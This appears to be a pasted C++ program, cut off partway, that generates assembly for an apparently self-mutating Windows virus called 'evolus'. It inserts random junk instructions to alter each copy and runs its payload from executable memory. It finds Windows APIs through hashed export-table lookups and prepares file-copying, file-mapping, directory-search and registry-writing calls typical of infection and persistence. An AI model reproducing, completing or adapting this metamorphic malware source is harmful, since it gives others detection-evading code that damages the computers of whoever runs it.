· 2 years ago · Jul 27, 2023, 07:01 AM
1#include <cstdlib>
2#include <iostream>
3#include <fstream>
4#include <windows.h>
5#include <stdio.h>
6#include <tchar.h>
7#include <list>
8#include <math.h>
9#include <sstream>
10#include <vector>
11
12using namespace std;
13
14ofstream file;
15
16string I2S(double n)
17{
18 stringstream out;
19 out << n;
20 string rv = out.str();
21 return(rv);
22}
23
24
25void addnumber(string BigNum);
26void GetAddress(string address);
27void CallAPI(string APIName);
28void CalcNewRandNumberAndSaveIt();
29void nopdC();
30void nopsC();
31void zer0(int rr);
32void subsaved(int rr);
33
34
35#define IntronInsertThreshold 11
36int IntronSTST;
37int IntronNOP;
38void CreateAnIntron()
39{
40 if (!(rand()%IntronInsertThreshold))
41 {
42 if (rand()%6)
43 {
44 // Here we use START+STOP intron
45
46 file << "db StopCodon" << endl;
47 while(rand()%31)
48 {
49
50 file << "db " << I2S((rand()%255)^0x67) << endl;
51 }
52 file << "db StartCodon" << endl;
53 IntronSTST++;
54 }
55 else
56 {
57 while(rand()%31)
58 {
59 //file << "db " << I2S((rand()%255)|0x91) << endl;
60 file << "_nopREAL" << endl;
61 }
62 IntronNOP++;
63 }
64 }
65}
66
67void addnumber(string BigNum)
68{
69 file << " BigNum=" << BigNum << endl;
70 file << " AlreadyStarted=0" << endl; CreateAnIntron();
71 file << " if BigNum<25" << endl; CreateAnIntron();
72 file << " repeat BigNum" << endl;
73 file << " _add0001" << endl;
74 file << " end repeat" << endl;
75 file << " else" << endl;
76 file << " _pushall" << endl; CreateAnIntron();
77 file << " _push ; BC1 to stack" << endl;
78 file << " _save" << endl; CreateAnIntron();
79 file << " _xor ; BC1=0" << endl;
80 file << " _add0001" << endl; CreateAnIntron();
81 file << " _save" << endl;
82 file << " _sub0001 ; BC1=0, BC2=1" << endl; CreateAnIntron();
83 file << " irp num, 0x80000000,0x40000000,0x20000000,0x10000000,0x8000000,0x4000000,0x2000000,0x1000000,0x800000,0x400000,0x200000,0x100000,0x80000,0x40000,0x20000,0x10000,0x8000,0x4000,0x2000,0x1000,0x800,0x400,0x200,0x100,0x80,0x40,0x20,0x10,0x8,0x4,0x2,0x1" << endl;
84 file << " {" << endl;
85 file << " if AlreadyStarted=1" << endl;
86 file << " _shl" << endl;
87 file << " end if" << endl;
88 file << " if (BigNum AND num)>0" << endl;
89 file << " _add0001" << endl;
90 file << " AlreadyStarted=1" << endl;
91 file << " end if" << endl;
92 file << " }" << endl;
93 file << " _save ; BC2=BigNum" << endl; CreateAnIntron();
94 file << " _pop ; restore BC1" << endl;
95 file << " _addsaved ; BC1=BC1+BigNum" << endl; CreateAnIntron();
96 nopdC();
97 file << " _popall ; Restore all registers" << endl;
98 nopsC();
99 file << " _pushall ; Restore ZF" << endl; CreateAnIntron();
100 file << " _save" << endl;
101 file << " _and" << endl;
102 file << " _popall" << endl;
103 file << " end if" << endl;
104
105}
106
107
108
109void GetAddress(string address)
110{
111 file << " _getDO" << endl; CreateAnIntron();
112 string tmpstr=address+"-DataOffset"; CreateAnIntron();
113 addnumber(tmpstr);
114}
115
116
117void CallAPI(string APIName)
118{
119 file << " _getDO" << endl; CreateAnIntron();
120 string tmpstr=APIName+"-DataOffset";
121 addnumber(tmpstr); CreateAnIntron();
122 file << " _getdata" << endl;
123 file << " _call" << endl; CreateAnIntron();
124}
125
126void CalcNewRandNumberAndSaveIt()
127{
128 GetAddress("RandomNumber");
129 file << " _saveWrtOff" << endl; CreateAnIntron();
130 file << " _getdata" << endl; CreateAnIntron();
131 file << " _nopdA ; eax=[RandomNumber]" << endl; CreateAnIntron();
132 zer0(0);
133 addnumber("1103515245");
134 file << " _mul ; eax*=1103515245 % 2^32" << endl; CreateAnIntron();
135 zer0(0);
136 addnumber("12345"); CreateAnIntron();
137 file << " _save" << endl;
138 file << " _nopsA" << endl; CreateAnIntron();
139 file << " _addsaved ; eax+=12345 % 2^32" << endl;
140 file << " _writeDWord ; mov [RandomNumber], ebx" << endl; CreateAnIntron();
141}
142
143void nopdC()
144{
145 file << " _pushall ; save all registers" << endl; CreateAnIntron();
146 file << " _push ; save BC1" << endl; CreateAnIntron();
147 file << " _getDO ; For code-optimization, RegC is at DataOffset+0x0. But could be anywhere as _add0001 exists." << endl; CreateAnIntron();
148 file << " _saveWrtOff ; BA1=RegC" << endl; CreateAnIntron();
149 file << " _pop" << endl; CreateAnIntron();
150 file << " _writeDWord ; mov dword[RegC], BC1" << endl; CreateAnIntron();
151 file << " _popall ; restore all registers" << endl; CreateAnIntron();
152}
153
154
155void nopsC()
156{
157 file << " _getDO ; For code-optimization, RegC is at DataOffset+0x0. But could be anywhere as _add0001 exists." << endl; CreateAnIntron();
158 file << " _getdata" << endl; CreateAnIntron();
159}
160
161
162
163void zer0(int rr)
164{
165 if (rr!=0)
166 {
167 file << "_pushall" << endl; CreateAnIntron();
168 }
169
170 file << "_save ; BC2=BC1" << endl; CreateAnIntron();
171 file << "_xor ; BC1=BC1 XOR BC2 = 0" << endl; CreateAnIntron();
172
173 if (rr!=0)
174 {
175 nopdC();
176 file << "_popall" << endl;
177 nopsC(); CreateAnIntron();
178 }
179}
180
181
182void subsaved(int rr)
183{
184 if (rr!=0)
185 {
186 file << " _pushall" << endl; CreateAnIntron();
187 }
188 file << " _push ; save BC1" << endl; CreateAnIntron();
189 zer0(1);
190 file << " _sub0001 ; BC1=0xFFFFFFFF" << endl; CreateAnIntron();
191 file << " _xor ; BC1=0xFFFFFFFF XOR BC2" << endl; CreateAnIntron();
192 file << " _add0001 ; BC1=-BC2" << endl; CreateAnIntron();
193 file << " _save ; BC2=-BC2" << endl; CreateAnIntron();
194 file << " _pop ; restore BC1" << endl; CreateAnIntron();
195 file << " _addsaved ; BC1=BC1+(-BC2)" << endl; CreateAnIntron();
196
197 if (rr!=0)
198 {
199 CreateAnIntron();
200 nopdC(); CreateAnIntron();
201 file << " _popall" << endl; CreateAnIntron();
202 nopsC(); CreateAnIntron();
203 file << " _pushall ; Restore ZF" << endl; CreateAnIntron();
204 file << " _save" << endl; CreateAnIntron();
205 file << " _and" << endl; CreateAnIntron();
206 file << " _popall" << endl; CreateAnIntron();
207 }
208}
209
210
211
212vector<string> RemoveElement(vector<string> *List, string Element)
213{
214 if (Element!="")
215 {
216 List->push_back("");
217 for (vector<string>::iterator i=List->begin(); i!=List->end(); ++i)
218 {
219 if ((*i)==Element) { List->erase(i); }
220 }
221 List->erase(List->end());
222 }
223 return(*List);
224}
225
226#define TranslatorIntron 2
227int cIntronN;
228void CreateIntronTranslator(bool wFlags=0, string El1="", string El2="", string El3="", string El4="", string El5="", string El6="", string El7="", string El8="")
229{
230// cout << wFlags << wEAX << wEBX << wECX << wEDX << wEBP << wESI << wEDI << endl << "- - -" << endl;
231 vector<string> AllReg;
232 AllReg.push_back("EAX"); AllReg.push_back("EBX"); AllReg.push_back("ECX"); AllReg.push_back("EDX");
233 AllReg.push_back("EDI"); AllReg.push_back("ESI"); AllReg.push_back("EBP"); AllReg.push_back("ESP");
234
235 vector<string> UnUsedReg;
236 UnUsedReg.push_back("EAX"); UnUsedReg.push_back("EBX"); UnUsedReg.push_back("ECX"); UnUsedReg.push_back("EDX");
237 UnUsedReg.push_back("EDI"); UnUsedReg.push_back("ESI"); UnUsedReg.push_back("EBP");
238 UnUsedReg=RemoveElement(&UnUsedReg,El1);
239 UnUsedReg=RemoveElement(&UnUsedReg,El2);
240 UnUsedReg=RemoveElement(&UnUsedReg,El3);
241 UnUsedReg=RemoveElement(&UnUsedReg,El4);
242 UnUsedReg=RemoveElement(&UnUsedReg,El5);
243 UnUsedReg=RemoveElement(&UnUsedReg,El6);
244 UnUsedReg=RemoveElement(&UnUsedReg,El7);
245 UnUsedReg=RemoveElement(&UnUsedReg,El8);
246
247 vector<string> ArithOp2Arg;
248 ArithOp2Arg.push_back("add");
249 ArithOp2Arg.push_back("sub");
250 ArithOp2Arg.push_back("xor");
251 ArithOp2Arg.push_back("and");
252 ArithOp2Arg.push_back("or");
253 ArithOp2Arg.push_back("cmp");
254 ArithOp2Arg.push_back("test");
255
256 vector<string> ArithOp1Arg;
257 ArithOp1Arg.push_back("inc");
258 ArithOp1Arg.push_back("dec");
259
260 vector<string> ShiftVec;
261 ShiftVec.push_back("shr");
262 ShiftVec.push_back("shl");
263
264
265 if (!(rand()%TranslatorIntron))
266 {
267 cIntronN++;
268
269 if (wFlags)
270 {
271 while (rand()%13)
272 {
273 int rr=rand()%8;
274 if (rr<3) { file << "nop" << endl; }
275 if (rr==4) { file << "mov " << UnUsedReg[rand()%UnUsedReg.size()] << "," << AllReg[rand()%AllReg.size()] << endl; }
276 if (rr==5) { file << "mov " << UnUsedReg[rand()%UnUsedReg.size()] << "," << rand() << endl; }
277 if (rr==6) { file << "xchg " << UnUsedReg[rand()%UnUsedReg.size()] << "," << UnUsedReg[rand()%UnUsedReg.size()] << endl; }
278 if (rr==7) { file << "push " << AllReg[rand()%AllReg.size()] << endl << "pop " << UnUsedReg[rand()%UnUsedReg.size()] << endl; }
279 if (rr==8) { file << "push " << rand() << endl << "pop " << UnUsedReg[rand()%UnUsedReg.size()] << endl; }
280 }
281 }
282 else
283 {
284 while (rand()%13)
285 {
286 int rr=rand()%25;
287 if (rr<3) { file << "nop" << endl; }
288 if (rr==4) { file << "mov " << UnUsedReg[rand()%(UnUsedReg.size())] << "," << AllReg[rand()%(AllReg.size())] << endl; }
289 if (rr==5) { file << "mov " << UnUsedReg[rand()%(UnUsedReg.size())] << "," << rand() << endl; }
290 if (rr==6) { file << "xchg " << UnUsedReg[rand()%(UnUsedReg.size())] << "," << UnUsedReg[rand()%(UnUsedReg.size())] << endl; }
291 if (rr==7) { file << "push " << AllReg[rand()%(AllReg.size())] << endl << "pop " << UnUsedReg[rand()%(UnUsedReg.size())] << endl; }
292 if (rr==8) { file << "push " << rand() << endl << "pop " << UnUsedReg[rand()%(UnUsedReg.size())] << endl; }
293 if (rr>8 && rr<=13) { file << ArithOp2Arg[rand()%ArithOp2Arg.size()] << " " << UnUsedReg[rand()%UnUsedReg.size()] << "," << AllReg[rand()%AllReg.size()] << endl; }
294 if (rr>13 && rr<=16) { file << ArithOp2Arg[rand()%ArithOp2Arg.size()] << " " << UnUsedReg[rand()%UnUsedReg.size()] << "," << rand() << endl; }
295 if (rr>16 && rr<=20) { file << ArithOp1Arg[rand()%ArithOp1Arg.size()] << " " << UnUsedReg[rand()%UnUsedReg.size()] << endl; }
296 if (rr>20 && rr<=23) { file << ShiftVec[rand()%ShiftVec.size()] << " " << UnUsedReg[rand()%UnUsedReg.size()] << ", " << rand()%(0x100) << endl; }
297 if (rr>23) { file << ShiftVec[rand()%ShiftVec.size()] << " " << UnUsedReg[rand()%UnUsedReg.size()] << ", cl" << endl; }
298 }
299 }
300 }
301}
302
303
304void ZeroRegister(string Reg)
305{
306 int rr=rand()%4;
307 if (rr==0)
308 {
309 file << "mov " << Reg << ",0" << endl;
310 }
311 if (rr==1)
312 {
313 file << "xor " << Reg << "," << Reg << endl;
314 }
315 if (rr==2)
316 {
317 file << "sub " << Reg << "," << Reg << endl;
318 }
319 if (rr==3)
320 {
321 file << "push 0" << endl << "pop " << Reg << endl;
322 }
323}
324
325
326void MovRegNum(string Reg, int Num)
327{
328 int rr=rand()%5;
329 if (rr==0)
330 {
331 file << "mov "<< Reg << "," << Num << endl;
332 }
333 if (rr==1)
334 {
335 ZeroRegister(Reg);
336 file << "add "<< Reg << "," << Num << endl;
337 }
338 if (rr==2)
339 {
340 ZeroRegister(Reg);
341 file << "sub "<< Reg << ",-" << Num << endl;
342 }
343 if (rr==3)
344 {
345 ZeroRegister(Reg);
346 file << "xor "<< Reg << "," << Num << endl;
347 }
348 if (rr==4)
349 {
350 ZeroRegister(Reg);
351 file << "or "<< Reg << "," << Num << endl;
352 }
353}
354
355void Lea(string Reg, string Address, string Num)
356{
357 int rr=rand()%2;
358 if (rr==0)
359 {
360 file << "mov "<< Reg << "," << Address << endl;
361 file << "add "<< Reg << "," << Num << endl;
362 }
363 if (rr==1)
364 {
365 ZeroRegister(Reg);
366 file << "lea "<< Reg << ",[" << Address << "+" << Num << "]" << endl;
367 }
368}
369
370int main()
371{
372 // Get the list of process identifiers.
373 cout << "\nCreate evolus with introns\n" << endl;
374 cout << "**************************\n\n" << endl;
375IntronSTST=0;
376IntronNOP=0;
377cIntronN=0;
378 srand ( time(NULL) );
379
380
381 file.open("evolus.asm");
382
383 vector<string> UseReg;
384 UseReg.push_back("EAX"); UseReg.push_back("EBX"); UseReg.push_back("EDX");
385
386 string SplicSepX=UseReg[rand()%UseReg.size()]; string SplicSepL=SplicSepX.substr(1,1)+"L"; UseReg=RemoveElement(&UseReg,SplicSepX);
387// cout << "SplicSepX: " << SplicSepX << endl;
388
389 UseReg.push_back("ECX");
390 string CodonContX=UseReg[rand()%UseReg.size()]; string CodonContL=CodonContX.substr(1,1)+"L"; UseReg=RemoveElement(&UseReg,CodonContX);
391// cout << "CodonContX: " << CodonContX << endl;
392
393 UseReg.push_back("EBP"); UseReg=RemoveElement(&UseReg,"ECX");
394 string CodonCount=UseReg[rand()%UseReg.size()]; UseReg=RemoveElement(&UseReg,CodonCount);
395// cout << "CodonCount: " << CodonCount << endl;
396
397 UseReg.push_back(CodonContX); UseReg.push_back("ECX");
398 string TmpReg=UseReg[rand()%UseReg.size()];
399// cout << "TmpReg: " << TmpReg << endl;
400// cin.get();
401
402
403file << "include " << static_cast<char>(39) << "E:" << static_cast<char>(92) << "Programme" << static_cast<char>(92) << "FASM" << static_cast<char>(92) << "INCLUDE" << static_cast<char>(92) << "win32ax.inc" << static_cast<char>(39) << "" << endl;
404file << "" << endl;
405file << "RndNum = %t AND 0xFFFF" << static_cast<char>(39) << "FFFF" << endl;
406file << "macro GetNewRandomNumber" << endl;
407file << "{" << endl;
408file << " RndNum = ((RndNum*214013+2531011) AND 0xFFFF" << static_cast<char>(39) << "FFFF)" << endl;
409file << "}" << endl;
410file << "" << endl;
411file << ".data" << endl;
412file << " include " << static_cast<char>(39) << "data_n_equs.inc" << static_cast<char>(39) << "" << endl;
413file << "; a db " << static_cast<char>(34) << "Am I allowed to live?" << static_cast<char>(34) << ",0x0" << endl;
414file << "; b db " << static_cast<char>(34) << "In evolution we trust" << static_cast<char>(34) << ",0x0" << endl;
415file << "" << endl;
416file << "" << endl;
417file << ".code" << endl;
418file << "start:" << endl;
419while(rand()%11){ CreateIntronTranslator(); }
420file << "" << endl; CreateIntronTranslator();
421file << " AlignedSize=0x1" << static_cast<char>(39) << "0000" << endl;
422file << " while ((EndAmino-StAmino)*8)>AlignedSize" << endl;
423file << " AlignedSize=AlignedSize+0x1" << static_cast<char>(39) << "0000" << endl;
424file << " end while" << endl;
425file << "" << endl; CreateIntronTranslator();
426file << " push PAGE_EXECUTE_READWRITE" << endl; CreateIntronTranslator();
427file << " push 0x1000" << endl;CreateIntronTranslator();
428file << " push AlignedSize" << endl; CreateIntronTranslator();
429file << " push 0x0" << endl; CreateIntronTranslator();
430file << " stdcall [VirtualAlloc]" << endl; CreateIntronTranslator(0, "EAX");
431file << " mov [Place4Life], eax" << endl; CreateIntronTranslator();
432ZeroRegister(SplicSepX); CreateIntronTranslator(0, SplicSepX);
433ZeroRegister(CodonCount); CreateIntronTranslator(0, SplicSepX, CodonCount);
434file << " WriteMoreToMemory:" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount);
435ZeroRegister(CodonContX); CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
436file << " mov " << CodonContL << ", byte[" << CodonCount << "+StAmino]" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
437file << " cmp " << CodonContL << ", StartCodon " << endl; CreateIntronTranslator(1, SplicSepX, CodonCount, CodonContX);
438file << " jne SplicingNoStart" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
439ZeroRegister(SplicSepX); CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
440file << " SplicingNoStart:" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
441file << " cmp " << CodonContL << ", StopCodon" << endl; CreateIntronTranslator(1, SplicSepX, CodonCount, CodonContX);
442file << " jne SplicingNoStop" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
443MovRegNum(SplicSepX, 0x91); CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
444file << " SplicingNoStop:" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
445file << " or " << CodonContL << ", " << SplicSepL << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
446file << " shl " << CodonContX << ", 3" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
447Lea("ESI", "StartAlphabeth", CodonContX);
448file << " mov " << TmpReg << "," << CodonCount << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, TmpReg, "ESI");
449file << " shl " << TmpReg << ", 3" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, TmpReg, "ESI");
450file << " mov edi, [Place4Life]" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, TmpReg, "ESI", "EDI");
451file << " add edi, " << TmpReg << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, "ESI", "EDI");
452MovRegNum("ECX", 8); CreateIntronTranslator(0, SplicSepX, CodonCount, "ESI", "EDI", "ECX");
453file << " rep movsb" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount);
454file << " inc " << CodonCount << endl; CreateIntronTranslator(0, SplicSepX, CodonCount);
455file << " cmp " << CodonCount << ", (EndAmino-StAmino)" << endl; CreateIntronTranslator(1, SplicSepX, CodonCount);
456file << " jne WriteMoreToMemory" << endl; CreateIntronTranslator();
457while(rand()%11){ CreateIntronTranslator(); }
458file << " call [Place4Life] ; Lets start!!!" << endl; CreateIntronTranslator();
459file << "" << endl;
460while(rand()%11){ CreateIntronTranslator(); }
461file << "" << endl;
462file << "" << endl;
463file << "" << endl;
464file << "; ##################################################################" << endl;
465file << "; Alphabeth" << endl;
466file << "StartAlphabeth:" << endl;
467file << "include " << static_cast<char>(39) << "alphabeth.inc" << static_cast<char>(39) << "" << endl;
468file << "CreateAlphabet" << endl;
469file << "" << endl;
470file << "EndAlphabeth:" << endl;
471file << "" << endl;
472file << "; ##################################################################" << endl;
473file << "" << endl;
474//file << "include " << static_cast<char>(39) << "instruction_set_macros.inc" << static_cast<char>(39) << "" << endl;
475file << "" << endl;
476file << "; ##################################################################" << endl;
477file << "; Amino Acids" << endl;
478for (int i=0; i<500; i++) { CreateAnIntron(); }
479file << "StAmino:" << endl;
480for (int i=0; i<500; i++) { CreateAnIntron(); }
481file << "" << endl;
482file << "; ############################################################################" << endl;
483file << "; ############################################################################" << endl;
484file << "; ############################################################################" << endl;
485file << "; #####" << endl;
486file << "; ##### Here the genom gets the Addresses of the Windows APIs." << endl;
487file << "; ##### It loads via LoadLibrary the kernel32.dll and advapi32.dll," << endl;
488file << "; ##### searchs in the Export Table for the adequade API (creating" << endl;
489file << "; ##### an internal 12 bit checksum, and compares it with some hardcoded" << endl;
490file << "; ##### 12bit values). This procedere should be evolvable." << endl;
491file << "; #####" << endl;
492file << "; ##### Optimum would have been to call the Windows APIs by its" << endl;
493file << "; ##### Ordinal Numbers, but they change at every release of Windows." << endl;
494file << "; #####" << endl;
495file << "; ##### At Linux, evolvable API calls are already presented, as you" << endl;
496file << "; ##### call int 0x80 with a specific number in eax which represents" << endl;
497file << "; ##### the API number." << endl;
498file << "; #####" << endl;
499file << "; #####" << endl;
500file << ";" << endl;
501file << "; The Hash-Algo is equivalent to:" << endl;
502file << "; ===============================" << endl;
503file << ";" << endl;
504file << ";;FindAPIGiveMeTheHash:" << endl;
505file << ";; In: ebx=pointer to API name" << endl;
506file << ";; Out: eax=Hash (in ax)" << endl;
507file << ";; changed: eax" << endl;
508file << ";; mov ebx, apistr" << endl;
509file << ";" << endl;
510file << "; push ebx" << endl;
511file << "; push ecx" << endl;
512file << "; push edx" << endl;
513file << "; xor eax, eax" << endl;
514file << "; xor ecx, ecx" << endl;
515file << "; dec ebx" << endl;
516file << "; FindAPIGiveMeTheHashMore:" << endl;
517file << "; inc ebx" << endl;
518file << "; mov ecx, dword[ebx]" << endl;
519file << "; xor eax, ecx" << endl;
520file << "; mov edx, ecx ; ecx=nooo - n ... new byte" << endl;
521file << "; shr edx, 8 ; edx=000n ... new byte" << endl;
522file << "; cmp dl, 0 ; dl=n" << endl;
523file << "; jne FindAPIGiveMeTheHashMore" << endl;
524file << ";" << endl;
525file << "; and eax, 0x0FFF" << endl;
526file << "; pop edx" << endl;
527file << "; pop ecx" << endl;
528file << "; pop ebx" << endl;
529file << ";ret" << endl;
530file << "" << endl;
531file << "" << endl;
532file << "" << endl;
533file << "StAminoAcids1:" << endl;
534file << "; repeat 100" << endl;
535file << "; _nopREAL" << endl;
536file << "; end repeat" << endl;
537file << "" << endl;
538file << "" << endl;
539file << " db _START" << endl;
540file << " db _STOP" << endl;
541file << "" << endl;
542file << " db _START" << endl;
543file << "" << endl;
544GetAddress("mCloseHandle");
545file << " _saveWrtOff" << endl; CreateAnIntron();
546zer0(0);
547addnumber("0x0342");
548file << " _writeDWord" << endl; CreateAnIntron();
549file << "" << endl;
550GetAddress("mCopyFileA");
551file << " _saveWrtOff" << endl; CreateAnIntron();
552zer0(0);
553addnumber("0x0C5C");
554file << " _writeDWord" << endl; CreateAnIntron();
555file << "" << endl;
556GetAddress("mCreateFileA");
557file << " _saveWrtOff" << endl; CreateAnIntron();
558zer0(0);
559addnumber("0x0615");
560file << " _writeDWord" << endl; CreateAnIntron();
561file << "" << endl;
562GetAddress("mCreateFileMappingA");
563file << " _saveWrtOff" << endl; CreateAnIntron();
564zer0(0);
565addnumber("0x04E1");
566file << " _writeDWord" << endl; CreateAnIntron();
567file << "" << endl;
568GetAddress("mCreateProcessA");
569file << " _saveWrtOff" << endl; CreateAnIntron();
570zer0(0);
571addnumber("0x0674");
572file << " _writeDWord" << endl; CreateAnIntron();
573file << "" << endl;
574GetAddress("mGetDriveTypeA");
575file << " _saveWrtOff" << endl; CreateAnIntron();
576zer0(0);
577addnumber("0x0AFD");
578file << " _writeDWord" << endl; CreateAnIntron();
579file << "" << endl;
580GetAddress("mGetCommandLineA");
581file << " _saveWrtOff" << endl; CreateAnIntron();
582zer0(0);
583addnumber("0x06A8");
584file << " _writeDWord" << endl; CreateAnIntron();
585file << "" << endl;
586GetAddress("mGetFileSize");
587file << " _saveWrtOff" << endl; CreateAnIntron();
588zer0(0);
589addnumber("0x083B");
590file << " _writeDWord" << endl; CreateAnIntron();
591file << "" << endl;
592GetAddress("mWriteFile");
593file << " _saveWrtOff" << endl; CreateAnIntron();
594zer0(0);
595addnumber("0x078B");
596file << " _writeDWord" << endl; CreateAnIntron();
597file << "" << endl;
598GetAddress("mGetTickCount");
599file << " _saveWrtOff" << endl; CreateAnIntron();
600zer0(0);
601addnumber("0x01B4");
602file << " _writeDWord" << endl; CreateAnIntron();
603file << "" << endl;
604GetAddress("mMapViewOfFile");
605file << " _saveWrtOff" << endl; CreateAnIntron();
606zer0(0);
607addnumber("0x05EE");
608file << " _writeDWord" << endl; CreateAnIntron();
609file << "" << endl;
610GetAddress("mSleep");
611file << " _saveWrtOff" << endl; CreateAnIntron();
612zer0(0);
613addnumber("0x07F9");
614file << " _writeDWord" << endl; CreateAnIntron();
615file << "" << endl;
616GetAddress("mFindFirstFileA");
617file << " _saveWrtOff" << endl; CreateAnIntron();
618zer0(0);
619addnumber("0x094A");
620file << " _writeDWord" << endl; CreateAnIntron();
621file << "" << endl;
622GetAddress("mFindNextFileA");
623file << " _saveWrtOff" << endl; CreateAnIntron();
624zer0(0);
625addnumber("0x0FE1");
626file << " _writeDWord" << endl; CreateAnIntron();
627file << "" << endl;
628GetAddress("mUnmapViewOfFile");
629file << " _saveWrtOff" << endl; CreateAnIntron();
630zer0(0);
631addnumber("0x01D1");
632file << " _writeDWord" << endl; CreateAnIntron();
633file << "" << endl;
634GetAddress("mSetErrorMode");
635file << " _saveWrtOff" << endl; CreateAnIntron();
636zer0(0);
637addnumber("0x0CBB");
638file << " _writeDWord" << endl; CreateAnIntron();
639file << "" << endl;
640GetAddress("mRegCreateKeyA");
641file << " _saveWrtOff" << endl; CreateAnIntron();
642zer0(0);
643addnumber("0x0EDC");
644file << " _writeDWord" << endl; CreateAnIntron();
645file << "" << endl;
646GetAddress("mRegSetValueExA");
647file << " _saveWrtOff" << endl; CreateAnIntron();
648zer0(0);
649addnumber("0x0845");
650file << " _writeDWord" << endl; CreateAnIntron();
651file << "" << endl;
652file << "" << endl;
653GetAddress("stDLLkernel32");
654file << " _saveWrtOff ; to the data-section. This will be used" << endl; CreateAnIntron();
655file << " _nopdA ; by LoadLibraryA as argument later" << endl; CreateAnIntron();
656zer0(0);
657addnumber("\'kern\'");
658file << " _writeDWord" << endl; CreateAnIntron();
659file << "" << endl;
660file << " _nopsA" << endl; CreateAnIntron();
661addnumber("4");
662file << " _saveWrtOff" << endl; CreateAnIntron();
663file << " _nopdA" << endl; CreateAnIntron();
664zer0(0);
665addnumber("\'el32\'");
666file << " _writeDWord" << endl; CreateAnIntron();
667file << "" << endl;
668file << " _nopsA" << endl; CreateAnIntron();
669addnumber("4");
670file << " _saveWrtOff" << endl; CreateAnIntron();
671file << " _nopdA" << endl; CreateAnIntron();
672zer0(0);
673addnumber("\'.dll\'");
674file << " _writeDWord" << endl; CreateAnIntron();
675
676GetAddress("stDLLadvapi32");
677file << " _saveWrtOff" << endl; CreateAnIntron();
678file << " _nopdA" << endl; CreateAnIntron();
679zer0(0);
680addnumber("\'adva\'");
681file << " _writeDWord" << endl; CreateAnIntron();
682
683file << " _nopsA" << endl; CreateAnIntron();
684addnumber("4");
685file << " _saveWrtOff" << endl; CreateAnIntron();
686file << " _nopdA" << endl; CreateAnIntron();
687zer0(0);
688addnumber("\'pi32\'");
689file << " _writeDWord" << endl; CreateAnIntron();
690
691file << " _nopsA" << endl; CreateAnIntron();
692addnumber("4");
693file << " _saveWrtOff" << endl; CreateAnIntron();
694file << " _nopdA" << endl; CreateAnIntron();
695zer0(0);
696addnumber("\'.dll\'");
697file << " _writeDWord" << endl; CreateAnIntron();
698
699
700GetAddress("stDLLkernel32");
701file << " _push" << endl; CreateAnIntron();
702file << " _CallAPILoadLibrary ; invoke LoadLibrary, " << static_cast<char>(34) << "kernel32.dll" << static_cast<char>(34) << "" << endl; CreateAnIntron();
703
704GetAddress("hDLLlibrary32");
705file << " _saveWrtOff" << endl; CreateAnIntron();
706
707
708file << " _nopsA" << endl; CreateAnIntron();
709file << " _writeDWord ; mov dword[hDLLkernel32], eax" << endl; CreateAnIntron();
710
711file << " _save ; Save kernel32.dll position" << endl; CreateAnIntron();
712addnumber("0x3C");
713file << " _getdata ; mov RegB, dword[hDLLkernel32+0x3C]" << endl; CreateAnIntron();
714file << " ; = Pointer to PE Header of kernel32.dll" << endl; CreateAnIntron();
715file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
716
717addnumber("0x78");
718file << " _getdata ; Export Tables" << endl; CreateAnIntron();
719file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
720addnumber("0x1C");
721
722file << " _nopdA ; temporarily save Offset of Addresse Table in RegA" << endl; CreateAnIntron();
723
724GetAddress("hAddressTable");
725file << " _saveWrtOff ; WriteOffset=hAddressTable" << endl; CreateAnIntron();
726
727file << " _nopsA ; restore RegA=Addresse Tables" << endl; CreateAnIntron();
728file << " _getdata ; Pointer To Addresse Table" << endl; CreateAnIntron();
729file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
730file << " _writeDWord ; mov dword[hAddressTable], (Pointer to Addresse Table)" << endl; CreateAnIntron();
731
732GetAddress("hNamePointerTable");
733file << " _saveWrtOff ; WriteOffset=hNamePointerTable" << endl; CreateAnIntron();
734
735file << " _nopsA ; BC1=Addresse Table" << endl; CreateAnIntron();
736addnumber("4");
737file << " _nopdA" << endl; CreateAnIntron();
738
739file << " _getdata ; Pointer To Name Table" << endl; CreateAnIntron();
740file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
741file << " _writeDWord ; mov dword[hNamePointerTable], (Pointer to Name Pointer Table)" << endl; CreateAnIntron();
742
743GetAddress("hOrdinalTable");
744file << " _saveWrtOff ; WriteOffset=hOrdinalTable" << endl; CreateAnIntron();
745
746file << " _nopsA" << endl; CreateAnIntron();
747addnumber("4");
748
749file << " _getdata ; Ordinal Table" << endl; CreateAnIntron();
750file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
751file << " _writeDWord ; mov dword[hOrdinalTable], (Pointer to Ordinal Table)" << endl; CreateAnIntron();
752
753
754
755GetAddress("APINumber");
756file << " _saveWrtOff" << endl; CreateAnIntron();
757zer0(1);
758addnumber("APINumberKernel");
759file << " _writeDWord ; Save number of kernel32.dll APIs" << endl; CreateAnIntron();
760
761
762GetAddress("hAddressePointer");
763file << " _saveWrtOff" << endl; CreateAnIntron();
764GetAddress("APIAddresses");
765file << " _writeDWord ; Saves the AddressePointer" << endl; CreateAnIntron();
766
767
768GetAddress("hMagicNumberPointer");
769file << " _saveWrtOff" << endl; CreateAnIntron();
770GetAddress("APIMagicNumbersKernel");
771file << " _writeDWord ; Saves the MagicNumber Pointer" << endl; CreateAnIntron();
772
773zer0(0);
774addnumber("43");
775file << " _push" << endl; CreateAnIntron();
776
777file << "; FindAllAPIs" << endl; CreateAnIntron();
778file << " _getEIP" << endl; CreateAnIntron();
779file << " _sub0001" << endl; CreateAnIntron();
780file << " _sub0001" << endl; CreateAnIntron();
781file << " _sub0001" << endl; CreateAnIntron();
